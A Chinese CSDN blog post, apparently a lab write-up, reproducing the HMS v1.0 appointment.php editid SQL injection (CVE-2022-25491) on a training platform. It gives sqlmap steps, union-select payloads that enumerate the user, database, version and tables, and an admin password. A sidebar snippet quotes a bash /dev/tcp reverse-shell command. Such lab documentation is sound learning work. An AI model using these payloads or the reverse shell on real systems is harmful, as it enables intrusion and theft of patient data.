HMS v1.0 appointment.php editid参数 SQL注入漏洞(CVE-2022-25491)

最新推荐文章于 2024-07-24 22:46:23 发布
最新推荐文章于 2024-07-24 22:46:23 发布
阅读量2.8k 收藏 6
点赞数
分类专栏: web笔记 安全笔记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/125590098
版权

文章目录

前言

暑假闲来无事打打靶机
用的是vulfocus在线平台,我也是第一次用,没想到一次使用只有15min,而且,做的这个没有wp,本次复现不完全,就说一下进行的过程吧

漏洞描述

医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。该系统或软件将有助于使整个功能无纸化。它将有关患者、医生、员工、医院管理细节等的所有信息集成到一个软件中。它有组成医院的各种专业人员的部分。

HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞。 admin/123456789

复现过程

思路一

我以为描述中的admin和123456789是最后的结果,需要注入拿到的。

就直接上sqlmap了

在登陆界面 有两个参数

在这里插入图片描述
随便输入提交一个并抓包
在这里插入图片描述

因为是post请求,需要把数据包导出来,选定loginid参数
在这里插入图片描述

在这里插入图片描述
可以看到是有四个数据库的

选定hms库查询其中的表
在这里插入图片描述

在这里插入图片描述
因为时间太慢了,但是一个靶机环境的时间只有15min
这里看到有user表 ,就直接选定user表了

查询user表中的列
在这里插入图片描述
在这里插入图片描述
到这里就能看到这里有三个字段

读取 这三个字段的值

在这里插入图片描述
在这里插入图片描述
到这里,发现密码不对啊,不是123456789
到这里这个思路已经中断了

思路二

这个思路参考https://www.cnblogs.com/HOPEAMOR/p/16251404.html

因为是appointment.php文件中的editid参数的漏洞,所以是需要登陆进去的

找到appointment页面

发送payload

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23#查看当前连接用户

在这里插入图片描述

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,database()%23#查看当前连接的数据库

在这里插入图片描述

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,version()%23#查看当前数据库版本

在这里插入图片描述

/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23#查询所有表

在这里插入图片描述

最后是基于时间的注入,emm没搞明白这个,没有反应,不知道读哪个表的数据

因为周末了要看剧

这个思路也暂时中断了……

sec0nd_
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HMS v1.0 SQL注入(CVE-2022-23366)
weixin_68999845的博客
08-16 1256
kabirkhyrul Hospital Managment System 存在SQL注入漏洞,该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。POST 请求 漏洞点在doctorlogin.php,POST body中,loginid和password参数存在字符型注入,单引号闭合,后跟明显的sql注入语句。本次使用在线靶场i春秋作为漏洞复现环境:https://yunjing.ichunqiu.com/cve/detail/740?·漏洞类型:sql注入漏洞。·漏洞威胁等级:超危。
HMS SQL注入(CVE-2022-25491)
m0_65150886的博客
12-29 613
2022年3月15日,CVE收录了编号CVE-2022-25491漏洞,该漏洞为在HMS v1.0版本中存在SQL注入漏洞,该漏洞允许攻击者通过手动调试appointment.php文件中的editid软件参数进行SQL注入攻击。目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/kabirkhyrul/HMS/discussions/8。通过CVE官网了解得到,该漏洞位置在appointment.php文件中的editid参数,这里发送Payload进行查看。
Hospital Management System v4.0 SQL 注入漏洞CVE-2022-24263)
Flag少侠的博客
07-08 9053
打开靶场进入靶场是这个页面网上查找漏洞相关信息点击登录可以看到有一个邮箱参数及密码,这里应该就是漏洞了打开 BurpSuite 拦截抓包复制值到 txt 文件中,使用 SQLMap 开跑省略爆库爆表过程……(太慢了)_____H__------[Y/n] n1ba6}[1 entry]| flag |
漏洞复现hms SQL注入-cve_2022_25491
qq_51780583的博客
03-26 389
医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。然后发现登录不上,再看登录选项发现只有admin/doctor/patient那就在表名里找这三个表的信息,先看admin相关登录信息。开始以为用户名是Kabir,然后后面抓包发现登录名是loginid,这里对应上就是admin,密码:123456789.通过CVE官网得知,该漏洞位于,appointment.php文件的editid参数。先判断闭合,当输入1,1'--+时正确有回显,1'时报错,说明是单引号闭合。
SQL注入
qq_53142368的博客
02-06 345
学习目标: SQL注入 学习内容: 1.了解SQL注入 2.SQL注入过程 3.联合查询 学习时间: 2021年2月5日 学习产出: 1.了解SQL注入 1.1SQL注入定义 SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点
HMS:医院管理系统
03-11
HMS,全称为Hospital Management System,是一款基于ASP.NET技术构建的医院管理软件。ASP.NET是微软公司推出的Web应用程序开发框架,它提供了丰富的功能和高效性能,使得开发者能够快速构建动态、交互式的Web服务和...
林肯焊机GSDML-V2.3-HMS-ABCC-PRT2P-20140703
05-25
【标题】"林肯焊机GSDML-V2.3-HMS-ABCC-PRT2P-20140703"所指的是一款由林肯电气公司生产的焊接设备,型号为GSDML-V2.3。该型号特别包含了HMS(高性能系统)、ABCC(自动电流控制)以及PRT2P(双极脉冲技术)等关键...
HMS CANopen硬件支持包HSP-0079 -S71200 -Canopen 1.0-V17版本
07-24
标题中的“HMS CANopen硬件支持包HSP-0079 -S71200 -Canopen 1.0-V17版本”是指由HMS Industrial Networks公司提供的一个针对Siemens S7-1200 PLC的CANopen设备接口解决方案。这个硬件支持包,也称为HSP(Hardware ...
HEC-HMS安装软件.7z
09-29
HEC模型是由美国陆军工程兵团(US Army Corps of Engineers)水资源机构下属的水文工程中心(Hydrologic Engineering Center)开发的一组水利工程应用软件。其幵发主要涉及流域水文分析计算、河道水力计算、泥沙迁移、...
HMS_1811_gsd_HMS1811_PCON系列_IAI电缸gsd文件_
09-30
IAI电缸的profibus GSD文件,属于PCON系列。
hms-push-serverdemo-php:PHP示例代码封装了HUAWEI Push Kit服务器的API,它提供了许多关于快速访问HUAWEI Push Kit的示例PHP程序,供您参考或使用。
05-10
HMS Pushkit PHP服务器 English | 目录 介绍 PHP示例代码封装了HUAWEI Push Kit服务器的API,并提供了许多关于快速访问HUAWEI Push Kit的示例PHP程序,供您参考或使用。 下表描述了PHP示例代码包。 包裹 描述 例子 ...
【vulfocus】/hms-cve_2022_25491:latest
最新发布
muyuchen110的博客
07-24 359
具体fllag信息没搞出来...............
SQL注入总结
weixin_50139963的博客
04-28 86
一:什么是SQL注入SQL注入是一种通过将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法。 二:SQL注入是怎么产生的? 首先WEB开发人员无法保证所有的输入都已经过滤,或者是数据库没有做相应的安全配置,客户端的数据未做处理或转义直接带入数据库,攻击者就利用发送给SQL服务器的输入数据构造可执行的SQL代码就造成了SQL注入,也就是用户提交了特定的字符导致SQL语句没有按照管理员设定的方式方法执行。 例如:这个查询,需要获取用户输入的姓名与密码 --正常情况下用..
HW常见攻击方式 -- SQL注入漏洞
weixin_41489908的博客
03-19 984
年轻的时候爱上什么都不为过,成熟了以后放弃什么都理解,我们终其一生,不过是想找一个能一起吃饭的人。。。 ---- 网易云热评 ​ 一、产生原因 代码与数据不区分。程序把用户输入的恶意内容传入SQL语句中执行,导致SQL注入漏洞产生。 二、常见挖掘方式 直接对url中的参数(请求参数、请求头)进行注入 Burp抓取post包进行注入 三、判断注入点 单引号判断:如果出现错误回显,则该页面就可能存在sql注入 http://www.webanquangongjuku.c...
CVE-2022-23366 春秋云境.com
qq_42036164的博客
01-12 353
CVE-2022-23366
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3817
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504
10-12 2983
phpmyadmin-SQL注入】写马
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值